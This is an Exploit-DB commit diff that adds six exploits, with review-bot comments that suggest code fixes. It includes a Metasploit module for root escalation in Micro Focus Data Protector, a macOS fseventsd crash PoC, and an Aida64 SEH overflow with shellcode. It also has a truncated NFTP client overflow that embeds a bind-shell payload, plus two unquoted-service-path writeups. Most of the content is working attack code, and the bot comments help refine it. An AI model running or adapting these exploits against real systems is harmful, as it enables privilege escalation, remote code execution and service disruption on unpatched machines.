DB: 2019-11-05
6 changes to exploits/shellcodes Apple macOS 10.15.1 - Denial of Service (PoC) Aida64 6.10.5200 - Buffer Overflow (SEH) OpenVPN Connect 3.0.0.272 - 'agent_ovpnconnect' Unquoted Service Path Launch Manager 6.1.7600.16385 - 'DsiWMIService' Unquoted Service Path Micro Focus (HPE) Data Protector - SUID Privilege Escalation (Metasploit) Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
This commit is contained in:
parent
47d2a76f4f
commit
577557762c
7 changed files with 695 additions and 0 deletions
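--- a/exploits/linux/local/47580.rb
+++ b/exploits/linux/local/47580.rb
@@ -0,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+Rank = ExcellentRanking
+
+include Msf::Post::File
+include Msf::Post::Linux::Priv
+include Msf::Post::Linux::System
+include Msf::Exploit::EXE
+include Msf::Exploit::FileDropper
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
+'Description' => %q{
+This module exploits the trusted `$PATH` environment
+variable of the SUID binary `omniresolve` in
+Micro Focus (HPE) Data Protector A.10.40 and prior.
+
+The `omniresolve` executable calls the `oracleasm` binary using
+a relative path and the trusted environment `$PATH`, which allows
+an attacker to execute a custom binary with `root` privileges.
+
+This module has been successfully tested on:
+HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;
+Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)
+
+The vulnerability has been patched in:
+Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'s7u55', # Discovery and Metasploit module
+],
+'DisclosureDate' => '2019-09-13',
+'Platform' => [ 'linux' ],
+'Arch' => [ ARCH_X86, ARCH_X64 ],
+'SessionTypes' => [ 'shell', 'meterpreter' ],
+'Targets' =>
+[
+[
+'Micro Focus (HPE) Data Protector <= 10.40 build 118',
+upper_version: Gem::Version.new('10.40')
+]
+],
+'DefaultOptions' =>
+{
+'PrependSetgid' => true,
+'PrependSetuid' => true
+},
+'References' =>
+[
+[ 'CVE', '2019-11660' ],
+[ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ]
+]
+))
+
+register_options(
+[
+OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ])
+])
+
+register_advanced_options(
+[
+OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
+OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+])
+end
+
+def base_dir
+datastore['WritableDir'].to_s
+end
+
+def suid_bin_path
+datastore['SUID_PATH'].to_s
+end
+
+def check
+unless setuid? suid_bin_path
+vprint_error("#{suid_bin_path} executable is not setuid")
+return CheckCode::Safe
+end
+
+info = cmd_exec("#{suid_bin_path} -ver").to_s
+if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/
+version = '%.2f' % $1.to_f
+build = $3.to_i
+vprint_status("omniresolve version #{version} build #{build}")
+
+unless Gem::Version.new(version) < target[:upper_version] ||
+(Gem::Version.new(version) == target[:upper_version] && build <= 118)
+return CheckCode::Safe
+end
+
+return CheckCode::Appears
+end
+
+vprint_error("Could not parse omniresolve -ver output")
+CheckCode::Detected
+end
+
+def exploit
+if check == CheckCode::Safe
+unless datastore['ForceExploit']
+fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+end
+print_warning 'Target does not appear to be vulnerable'
+end
+
+if is_root?
+unless datastore['ForceExploit']
+fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
+end
+end
+
+unless writable?(base_dir)
+fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+end
+
+payload_path = File.join(base_dir, 'oracleasm')
+register_file_for_cleanup(payload_path)
+write_file(payload_path, generate_payload_exe)
+chmod(payload_path)
+
+trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
+register_file_for_cleanup(trigger_path)
+write_file(trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")
+cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{trigger_path} & echo ")
+end
+end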
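Review bot: The fixed-build threshold is hard-coded as `build <= 118` inside `check`, while the same number otherwise appears only in the target's display name `'Micro Focus (HPE) Data Protector <= 10.40 build 118'`, so the two will drift apart the first time the target list is edited. Carry it in the target metadata next to the version, `upper_version: Gem::Version.new('10.40'), upper_build: 118`, and compare with `build <= target[:upper_build]`. The version string is also round-tripped through a float (`'%.2f' % $1.to_f`) before `Gem::Version.new`, and `$1`/`$3` are the implicit match globals; using named captures and passing the captured string straight to `Gem::Version.new` avoids both. In `exploit`, `base_dir` and `suid_bin_path` are interpolated into the `cmd_exec` shell strings unquoted, so a `WritableDir` containing a space breaks the command instead of being rejected up front by the `writable?` check.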
237
exploits/macos/dos/47578.c
Normal file
237
exploits/macos/dos/47578.c
Normal file
|
@ -0,0 +1,237 @@
|
|||
# Exploit Title: Apple macOS 10.15.1 - Denial of Service (PoC)
|
||||
# Date: 2019-11-02
|
||||
# Exploit Author: 08Tc3wBB
|
||||
# Vendor Homepage: Apple
|
||||
# Software Link:
|
||||
# Version: Apple macOS < 10.15.1 / iOS < 13.2
|
||||
# Tested on: Tested on macOS 10.14.6 and iOS 12.4.1
|
||||
# CVE : N/A
|
||||
# Type : DOS
|
||||
# https://support.apple.com/en-us/HT210721
|
||||
|
||||
----- Execution file path:
|
||||
/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/Support/fseventsd
|
||||
|
||||
fseventsd running as root and unsandboxed on both iOS and macOS, and accessible from within the Application sandbox.
|
||||
|
||||
----- Analysis
|
||||
|
||||
Env: macOS 10.14.6
|
||||
I named following pseudocode functions to help you understand the execution flow.
|
||||
|
||||
void __fastcall routine_1(mach_msg_header_t *msg, mach_msg_header_t *reply) // 0x100001285
|
||||
{
|
||||
...
|
||||
v9 = implementation_register_rpc(
|
||||
msg->msgh_local_port,
|
||||
msg[1].msgh_size,
|
||||
msg[4].msgh_reserved,
|
||||
(unsigned int)msg[4].msgh_id,
|
||||
*(_QWORD *)&msg[1].msgh_reserved, // input_mem1
|
||||
msg[2].msgh_size >> 2, // input_mem1_len
|
||||
*(_QWORD *)&msg[2].msgh_remote_port, // input_mem2
|
||||
msg[2].msgh_id, // input_mem2_len
|
||||
msg[5].msgh_remote_port,
|
||||
*(_QWORD *)&msg[3].msgh_bits, // input_mem3
|
||||
msg[3].msgh_local_port >> 2, // input_mem3_len
|
||||
*(_QWORD *)&msg[3].msgh_reserved, // input_mem4
|
||||
msg[4].msgh_size); // input_mem4_len
|
||||
...
|
||||
}
|
||||
routine_1 will be executed when user send mach_msg to Mach Service "com.apple.FSEvents" with id 0x101D0
|
||||
|
||||
And routine_1 internally invokes a function called fsevent_add_client to process data included in input_mem1/input_mem2
|
||||
|
||||
I marked five places with: (1) (2) (3) (4) (5)
|
||||
These are the essential points cause this vulnerability.
|
||||
|
||||
void *fsevent_add_client(...)
|
||||
{
|
||||
...
|
||||
v25 = malloc(8LL * input_mem1_len); // (1) Allocate a new buffer with input_mem1_len, didn't initializing its content.
|
||||
*(_QWORD *)(eventobj + 136) = v25; // Subsequently insert that new buffer into (eventobj + 136)
|
||||
...
|
||||
|
||||
v20 = ... // v20 point to an array of strings that was created based on user input
|
||||
|
||||
// The following process is doing recursive parsing to v20
|
||||
|
||||
index = 0LL;
|
||||
while ( 1 )
|
||||
{
|
||||
v26 = *(const char **)(v20 + 8 * index);
|
||||
|
||||
...
|
||||
|
||||
v28 = strstr(*(const char **)(v20 + 8 * index), "/.docid");
|
||||
v27 = v26;
|
||||
if ( !v28 ) // (2) If input string doesn't contain "/.docid", stop further parse, go straight to strdup
|
||||
goto LABEL_15;
|
||||
|
||||
if ( strcmp(v28, "/.docid") ) // (3) If an input string doesn't exactly match "/.docid", goto LABEL_16
|
||||
goto LABEL_16;
|
||||
|
||||
*(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(".docid");
|
||||
|
||||
LABEL_17:
|
||||
if ( ++index >= input_mem1_len )
|
||||
goto LABEL_21;
|
||||
}
|
||||
|
||||
v27 = *(const char **)(v20 + 8 * index);
|
||||
LABEL_15:
|
||||
*(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(v27);
|
||||
|
||||
|
||||
LABEL_16:
|
||||
if ( *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) )
|
||||
goto LABEL_17; // (4) So far the new buffer has never been initialized, but if it contain any wild value, it will goto LABEL_17, which program will retain that wild value and go on to parse next input_string
|
||||
...
|
||||
|
||||
|
||||
// (5) Since all values saved in the new buffer supposed to be the return value of strdup, they will all be free'd later on. So if spray works successfully, the attacker can now has the ability to call free() on any address, further develop it to modify existing memory data.
|
||||
}
|
||||
|
||||
However there is a catch, fseventsd only allow input_mem1_len be 1 unless the requested proc has root privilege, led to the size of uninitialized buffer can only be 8, such small size caused it very volatile, hard to apply desired spray work unless discover something else to assist. Or exploit another system proc (sandboxed it's okay), and borrow their root credential to send the exploit msg.
|
||||
|
||||
----- PoC
|
||||
|
||||
// clang poc.c -framework CoreFoundation -o poc
|
||||
|
||||
#include <stdio.h>
|
||||
#include <xpc/xpc.h>
|
||||
#include <CoreFoundation/CoreFoundation.h>
|
||||
#include <bootstrap.h>
|
||||
|
||||
mach_port_t server_port = 0;
|
||||
mach_port_t get_server_port(){
|
||||
if(server_port)
|
||||
return server_port;
|
||||
bootstrap_look_up(bootstrap_port, "com.apple.FSEvents", &server_port);
|
||||
return server_port;
|
||||
}
|
||||
|
||||
int trigger_bug = 0;
|
||||
int has_reach_limit = 0;
|
||||
uint32_t call_routine_1(){
|
||||
|
||||
struct SEND_Msg{
|
||||
mach_msg_header_t Head;
|
||||
mach_msg_body_t msgh_body;
|
||||
mach_msg_port_descriptor_t port;
|
||||
mach_msg_ool_descriptor_t mem1;
|
||||
mach_msg_ool_descriptor_t mem2;
|
||||
mach_msg_ool_descriptor_t mem3;
|
||||
mach_msg_ool_descriptor_t mem4;
|
||||
// Offset to here : +104
|
||||
|
||||
uint64_t unused_field1;
|
||||
uint32_t input_num1; // +112
|
||||
uint32_t input_num2; // +116
|
||||
uint64_t len_auth1; // +120 length of mem1/mem2
|
||||
uint32_t input_num3; // +128
|
||||
uint64_t len_auth2; // +132 length of mem3/mem4
|
||||
|
||||
char unused_field[20];
|
||||
};
|
||||
|
||||
struct RECV_Msg{
|
||||
mach_msg_header_t Head; // Size: 24
|
||||
mach_msg_body_t msgh_body;
|
||||
mach_msg_port_descriptor_t port;
|
||||
uint64_t NDR_record;
|
||||
};
|
||||
|
||||
struct SEND_Msg *msg = malloc(0x100);
|
||||
bzero(msg, 0x100);
|
||||
|
||||
msg->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND);
|
||||
msg->Head.msgh_size = 160;
|
||||
int kkk = get_server_port();
|
||||
msg->Head.msgh_remote_port = kkk;
|
||||
msg->Head.msgh_local_port = mig_get_reply_port();
|
||||
msg->Head.msgh_id = 0x101D0;
|
||||
msg->msgh_body.msgh_descriptor_count = 5;
|
||||
|
||||
msg->port.type = MACH_MSG_PORT_DESCRIPTOR;
|
||||
msg->mem1.deallocate = false;
|
||||
msg->mem1.copy = MACH_MSG_VIRTUAL_COPY;
|
||||
msg->mem1.type = MACH_MSG_OOL_DESCRIPTOR;
|
||||
memcpy(&msg->mem2, &msg->mem1, sizeof(msg->mem1));
|
||||
memcpy(&msg->mem3, &msg->mem1, sizeof(msg->mem1));
|
||||
memcpy(&msg->mem4, &msg->mem1, sizeof(msg->mem1));
|
||||
|
||||
mach_port_t port1=0;
|
||||
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port1);
|
||||
|
||||
msg->port.name = port1;
|
||||
msg->port.disposition = MACH_MSG_TYPE_MAKE_SEND;
|
||||
|
||||
uint64_t empty_data = 0;
|
||||
if(trigger_bug){
|
||||
|
||||
msg->input_num1 = 5;
|
||||
|
||||
msg->mem1.address = &empty_data;
|
||||
msg->mem1.size = 4;
|
||||
msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth
|
||||
|
||||
msg->mem2.address = "/.docid1";
|
||||
msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1;
|
||||
}
|
||||
else{
|
||||
msg->input_num1 = 1;
|
||||
|
||||
msg->mem1.address = &empty_data;
|
||||
msg->mem1.size = 4;
|
||||
msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth
|
||||
|
||||
msg->mem2.address = "/.dacid1";
|
||||
msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1;
|
||||
}
|
||||
|
||||
msg->mem3.address = 0;
|
||||
msg->mem3.size = 0;
|
||||
msg->input_num3 = msg->mem3.size >> 2; // input_mem3_len_auth
|
||||
|
||||
msg->mem4.address = 0;
|
||||
msg->mem4.size = 0;
|
||||
|
||||
msg->len_auth1 = ((uint64_t)msg->mem2.size << 32) | (msg->mem1.size >> 2);
|
||||
msg->len_auth2 = ((uint64_t)msg->mem4.size << 32) | (msg->mem3.size >> 2);
|
||||
|
||||
mach_msg((mach_msg_header_t*)msg, MACH_SEND_MSG|(trigger_bug?0:MACH_RCV_MSG), msg->Head.msgh_size, 0x100, msg->Head.msgh_local_port, 0, 0);
|
||||
|
||||
int32_t errCode = *(int32_t*)(((char*)msg) + 0x20);
|
||||
if(errCode == -21){
|
||||
has_reach_limit = 1;
|
||||
}
|
||||
|
||||
mig_dealloc_reply_port(msg->Head.msgh_local_port);
|
||||
struct RECV_Msg *recv_msg = (void*)msg;
|
||||
|
||||
uint32_t return_port = recv_msg->port.name;
|
||||
free(msg);
|
||||
|
||||
return return_port;
|
||||
}
|
||||
|
||||
int main(int argc, const char * argv[]) {
|
||||
|
||||
printf("PoC started running...\n");
|
||||
|
||||
uint32_t aaa[1000];
|
||||
for(int i=0; i<=1000; i++){
|
||||
if(has_reach_limit){
|
||||
trigger_bug = 1;
|
||||
call_routine_1();
|
||||
break;
|
||||
}
|
||||
aaa[i] = call_routine_1();
|
||||
}
|
||||
|
||||
printf("Finished\n");
|
||||
printf("Check crash file beneath /Library/Logs/DiagnosticReports/\n");
|
||||
|
||||
return 0;
|
||||
}
|
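Review bot: `main` declares `uint32_t aaa[1000]` but the loop runs `for(int i=0; i<=1000; i++)`, so the last iteration writes `aaa[1000]`, one element past the end of the stack array; the bound should be `i < 1000` (and since `aaa` is never read afterwards it could be dropped altogether). Separately, the file as committed is not the compilable `poc.c` its own comment `clang poc.c -framework CoreFoundation -o poc` describes: the header lines and the analysis section above `----- PoC` are bare text rather than C comments, so they would need to be wrapped in `/* ... */` or moved to a separate note before that command works. `get_server_port` also ignores the return value of `bootstrap_look_up`, so a failed lookup leaves `server_port` at 0 and the caller proceeds with a null port instead of reporting the error.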
70
exploits/windows/local/47574.py
Executable file
70
exploits/windows/local/47574.py
Executable file
|
@ -0,0 +1,70 @@
|
|||
# Exploit Title: Aida64 6.10.5200 - Buffer Overflow (SEH)
|
||||
# Date: 2019-10-28
|
||||
# Exploit Author: 8-Team / daejinoh
|
||||
# Vendor Homepage: https://www.aida64.com
|
||||
# Software Link: https://www.aida64.com/downloads/OTAwMmVmNTE=
|
||||
# Version: AIDA64 Enginner 6.10.5200
|
||||
# Tested on: Windows 7 Home Basic SP1
|
||||
# CVE : N/A
|
||||
|
||||
# Step
|
||||
1) File -> Preferences -> Logging -> Log sensor readings to CSV log file
|
||||
2) Paste payload from "aida64.txt" -> Apply
|
||||
3) File -> Exit
|
||||
|
||||
# Exploit Code
|
||||
#! Python
|
||||
|
||||
import struct
|
||||
|
||||
# shell code
|
||||
buf = ""
|
||||
buf += "\x89\xe2\xda\xc3\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49"
|
||||
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
|
||||
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
|
||||
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
|
||||
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4f\x4e\x68\x58\x49"
|
||||
buf += "\x67\x59\x34\x58\x38\x6a\x7a\x49\x4b\x78\x59\x42\x54"
|
||||
buf += "\x55\x74\x6c\x34\x66\x38\x65\x63\x6b\x79\x6c\x71\x34"
|
||||
buf += "\x71\x4f\x73\x79\x50\x66\x64\x55\x61\x30\x70\x34\x4f"
|
||||
buf += "\x54\x43\x62\x50\x78\x57\x72\x35\x42\x71\x67\x34\x34"
|
||||
buf += "\x4f\x33\x6b\x4c\x5a\x38\x35\x78\x4f\x35\x6c\x52\x32"
|
||||
buf += "\x76\x30\x49\x6e\x51\x6c\x37\x30\x56\x70\x32\x70\x70"
|
||||
buf += "\x4d\x43\x32\x62\x54\x31\x4c\x37\x56\x43\x76\x50\x6d"
|
||||
buf += "\x68\x57\x73\x7a\x50\x4f\x4f\x72\x52\x70\x59\x70\x6d"
|
||||
buf += "\x79\x4c\x6d\x75\x31\x32\x79\x6b\x39\x4e\x4c\x68\x61"
|
||||
buf += "\x39\x30\x39\x4e\x36\x6e\x48\x58\x73\x5a\x37\x63\x50"
|
||||
buf += "\x4e\x37\x6d\x6f\x66\x4b\x6e\x46\x62\x48\x76\x69\x4c"
|
||||
buf += "\x52\x6d\x38\x33\x33\x43\x6e\x48\x50\x4d\x47\x48\x6a"
|
||||
buf += "\x6f\x67\x4c\x49\x46\x39\x4d\x4e\x67\x75\x6f\x6a\x57"
|
||||
buf += "\x64\x33\x6f\x6c\x36\x79\x69\x47\x33\x42\x51\x61\x47"
|
||||
buf += "\x62\x43\x6e\x72\x4d\x6a\x36\x77\x6f\x75\x78\x45\x56"
|
||||
buf += "\x72\x4c\x48\x6b\x6e\x4b\x5a\x6e\x4d\x6d\x75\x44\x56"
|
||||
buf += "\x67\x54\x6f\x70\x72\x7a\x47\x36\x39\x34\x37\x4f\x44"
|
||||
buf += "\x62\x38\x74\x6c\x6d\x51\x48\x47\x39\x35\x54\x77\x31"
|
||||
buf += "\x46\x6f\x4a\x31\x61\x6f\x4d\x30\x4d\x47\x6c\x48\x71"
|
||||
buf += "\x42\x45\x6f\x5a\x4f\x6d\x69\x46\x4c\x30\x65\x69\x4c"
|
||||
buf += "\x51\x5a\x33\x54\x37\x71\x75\x4e\x55\x56\x42\x43\x6b"
|
||||
buf += "\x65\x4d\x6a\x61\x4e\x4f\x31\x4a\x4b\x42\x47\x30\x4a"
|
||||
buf += "\x4b\x62\x58\x49\x46\x73\x39\x4c\x6f\x39\x71\x50\x4f"
|
||||
buf += "\x4b\x47\x35\x4e\x37\x6d\x6e\x6f\x43\x68\x6b\x4e\x4f"
|
||||
buf += "\x4b\x39\x4b\x33\x44\x4a\x4b\x58\x31\x4e\x61\x32\x32"
|
||||
buf += "\x59\x7a\x77\x34\x6d\x6c\x66\x30\x5a\x4c\x33\x66\x6f"
|
||||
buf += "\x4f\x7a\x64\x6d\x55\x53\x57\x64\x74\x6c\x4b\x5a\x72"
|
||||
buf += "\x73\x47\x6d\x4f\x4b\x58\x34\x6d\x50\x32\x6e\x62\x76"
|
||||
buf += "\x38\x6f\x56\x6f\x6b\x56\x36\x6e\x39\x4e\x4b\x45\x4b"
|
||||
buf += "\x6e\x6d\x77\x6d\x78\x52\x4f\x6f\x71\x34\x49\x4d\x71"
|
||||
buf += "\x31\x6d\x6f\x30\x4c\x4a\x78\x70\x6e\x46\x67\x4d\x6c"
|
||||
buf += "\x6c\x50\x69\x6f\x49\x72\x49\x52\x53\x37\x69\x6f\x54"
|
||||
buf += "\x66\x49\x31\x4b\x76\x4d\x43\x4c\x6b\x56\x68\x42\x4d"
|
||||
buf += "\x76\x74\x33\x79\x76\x35\x41\x41"
|
||||
|
||||
# Exploit Payload
|
||||
sehNext = struct.pack('<L',0x909010EB) # SHORT JMP
|
||||
sehHandler = struct.pack('<L',0x0120c8b6) # POP POP RET
|
||||
|
||||
payload = 'A' * (1115 - 4) + sehNext + sehHandler + "\x90" * 16 + buf +"B"*1000
|
||||
|
||||
f = open("aida64.txt", "wb")
|
||||
f.write(payload)
|
||||
f.close()
|
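Review bot: The lines `1) File -> Preferences -> Logging -> Log sensor readings to CSV log file` through `3) File -> Exit` under `# Step` are not commented out, so the file as committed raises a SyntaxError before `import struct` is ever reached; they need a leading `#` like the header lines around them. `#! Python` is also not a usable shebang, and the `str` concatenation of the `"\x89..."` literals with `struct.pack` output only works under Python 2, so `#!/usr/bin/env python2` (the form the other script in this commit uses) would document that. The output file is opened with `f = open("aida64.txt", "wb")` and closed by hand; `with open("aida64.txt", "wb") as f:` closes it even if `write` raises.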
34
exploits/windows/local/47575.txt
Normal file
34
exploits/windows/local/47575.txt
Normal file
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: OpenVPN Connect 3.0.0.272 - 'ovpnagent' Unquoted Service Path
|
||||
# Discovery by: Luis Martinez
|
||||
# Discovery Date: 2019-11-03
|
||||
# Vendor Homepage: https://openvpn.net
|
||||
# Software Link : https://openvpn.net/downloads/openvpn-connect-v3-windows.msi
|
||||
# Tested Version: 3.0.0.(272)
|
||||
# Vulnerability Type: Unquoted Service Path
|
||||
# Tested on OS: Windows 10 Pro x64 es
|
||||
|
||||
# Step to discover Unquoted Service Path:
|
||||
|
||||
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ovpnconnect" | findstr /i /v """
|
||||
|
||||
OpenVPN Agent agent_ovpnconnect agent_ovpnconnect C:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exe Auto
|
||||
|
||||
# Service info:
|
||||
|
||||
C:\>sc qc agent_ovpnconnect
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: agent_ovpnconnect
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : OpenVPN Agent agent_ovpnconnect
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
#Exploit:
|
||||
|
||||
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
|
38
exploits/windows/local/47577.txt
Normal file
38
exploits/windows/local/47577.txt
Normal file
|
@ -0,0 +1,38 @@
|
|||
# Title: Launch Manager 6.1.7600.16385 'DsiWMIService' Unquoted Service Path
|
||||
# Author: Gustavo Briseño
|
||||
# Date: 2019-11-03
|
||||
# Vendor Homepage: https://www.acer.com/
|
||||
# Software Link: https://global-download.acer.com/GDFiles/Application/LaunchManager/LaunchManager_Dritek_6.1.7600.16385_W7x86W7x64_A.zip?acerid=634193506101268520&Step1=NOTEBOOK&Step2=ASPIRE&Step3=ASPIRE%204333&OS=ALLLC=es&BC=ACER&SC=PA_2#_ga=2.248825730.460116227.1572829430-701800474.1572829429
|
||||
# Version : Launch Manager 6.1.7600.16385
|
||||
# Tested on: Windows 7 Home Basic 64bit
|
||||
# CVE : N/A
|
||||
|
||||
# =====================================================
|
||||
# 1. Description:
|
||||
# Unquoted service paths in DsiWMIService have an unquoted service path.
|
||||
|
||||
#PoC
|
||||
===========
|
||||
C:\>sc qc DsiWMIService
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: DsiWMIService
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files (x86)\Launch Manager\dsiwmis.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : Dritek WMI Service
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
C:\>
|
||||
|
||||
#Exploit:
|
||||
============
|
||||
A successful attempt would require the local user to be able to insert
|
||||
their code in the system root path undetected by the OS or other
|
||||
security applications where it could potentially be executed during
|
||||
application startup or reboot. If successful, the local user's code
|
||||
would execute with the elevated privileges of the application.
|
176
exploits/windows/remote/47576.py
Executable file
176
exploits/windows/remote/47576.py
Executable file
|
@ -0,0 +1,176 @@
|
|||
# Exploit Title: Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
|
||||
# Date: 2019-11-03
|
||||
# Exploit Author: Chase Hatch (SYANiDE)
|
||||
# Vendor Homepage: http://ayukov.com/nftp/
|
||||
# Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe
|
||||
# Version: 1.71
|
||||
# Tested on: Windows XP Pro SP0, SP1, SP2, SP3
|
||||
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2017-15222
|
||||
# Steps to reproduce:
|
||||
# Run the server with the valid Windows version
|
||||
# Connect the client to the malicious server
|
||||
# bind shell on port 5150
|
||||
|
||||
#!/usr/bin/env python2
|
||||
import os, sys, socket
|
||||
|
||||
NARGS = len(sys.argv)
|
||||
|
||||
# ntdll.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
|
||||
# kernel32.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
|
||||
# 7C923A95 FFD6 CALL ESI # Windows XP Pro SP3; ntdll.dll
|
||||
# 7C927543 FFD6 CALL ESI # Windows XP Pro SP2; ntdll.dll
|
||||
# 77E641C7 FFE6 JMP ESI # Windows XP Pro SP1; kernel32.dll
|
||||
# 77E667F3 FFE6 JMP ESI # Windows XP Pro SP0: kernel32.dll
|
||||
tourRETs = {
|
||||
"XPProSP3": "\x95\x3A\x92\x7c",
|
||||
"XPProSP2": "\x43\x75\x92\x7C",
|
||||
"XPProSP1": "\xc7\x41\xe6\x77",
|
||||
"XPProSP0": "\xf3\x67\xe6\x77"
|
||||
}
|
||||
|
||||
|
||||
if not NARGS > 1:
|
||||
print("USAGE: %s version" % sys.argv[0])
|
||||
print("[.] version must be in:")
|
||||
for item in tourRETs:
|
||||
print("\t%s" % item)
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
# sploit = "A"*5000 # crash! in SYST cmd, 41414141 in EIP and EBP
|
||||
# ESP and ESI both pointers to somewhere in the As
|
||||
# If I increase the overflow string to 10000, the area ESP points to at crash
|
||||
#, goes from 864 bytes of uninterrupted \x41's to roughly 4056 bytes.
|
||||
# sploit = "A"*10000
|
||||
# sploit = sys.argv[1] # $(`locate pattern_create.rb|head -n 1` 10000) # 46326846 in EIP
|
||||
# `locate pattern_offset.rb |head -n 1` 46326846 10000 # 4116
|
||||
sploit = "A"*4116
|
||||
|
||||
# Add the return address
|
||||
try:
|
||||
sploit += tourRETs[sys.argv[1]]
|
||||
except KeyError, x:
|
||||
print("[!] Version %s: not a valid version! Possibly bad capitalization" % str(x))
|
||||
sys.exit(1)
|
||||
|
||||
sploit += ("\x90"*12) # original calcs based on RET*4... oops. realign.
|
||||
|
||||
# echo "ibase=16;obase=10;0247CED1 - 0247C834" |bc # 0x69D (1693); ESP-ESI
|
||||
sploit += "\x90"*1693 # leaves 16 nops at jmp/call target before Cs
|
||||
|
||||
|
||||
# badchars = "\x00\x0a\x0d"
|
||||
# locate EIP and align ESP to a close future 4 and 16 byte boundary
|
||||
NOTES = """\
|
||||
$-37 > D9EE FLDZ
|
||||
$-35 > D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C]
|
||||
$-31 > 59 POP ECX
|
||||
$-30 > 80C1 09 ADD CL,9
|
||||
$-2D > 80C1 04 ADD CL,4
|
||||
$-2A > 80C1 2A ADD CL,2A
|
||||
$-27 > 80C5 01 ADD CH,1
|
||||
$-24 > 51 PUSH ECX
|
||||
$-23 > 5C POP ESP
|
||||
"""
|
||||
sploit += "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xc1\x09\x80\xc1\x04" #13 bytes
|
||||
sploit += "\x80\xc1\x2a\x80\xc5\x01\x51\x5c" # 8 bytes
|
||||
sploit += "\x90" * 0x22 # ESP = EIP
|
||||
sploit += "\x90" * 20 # sled for shikata_ga_nai unpack
|
||||
|
||||
# msfvenom -p windows/shell_bind_tcp LPORT=5150 EXITFUNC=process
|
||||
# -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -i 1 -f c
|
||||
sploit += (
|
||||
"\xba\xd2\xe1\x61\xb1\xdb\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
|
||||
"\x53\x83\xeb\xfc\x31\x53\x0e\x03\x81\xef\x83\x44\xd9\x18\xc1"
|
||||
"\xa7\x21\xd9\xa6\x2e\xc4\xe8\xe6\x55\x8d\x5b\xd7\x1e\xc3\x57"
|
||||
"\x9c\x73\xf7\xec\xd0\x5b\xf8\x45\x5e\xba\x37\x55\xf3\xfe\x56"
|
||||
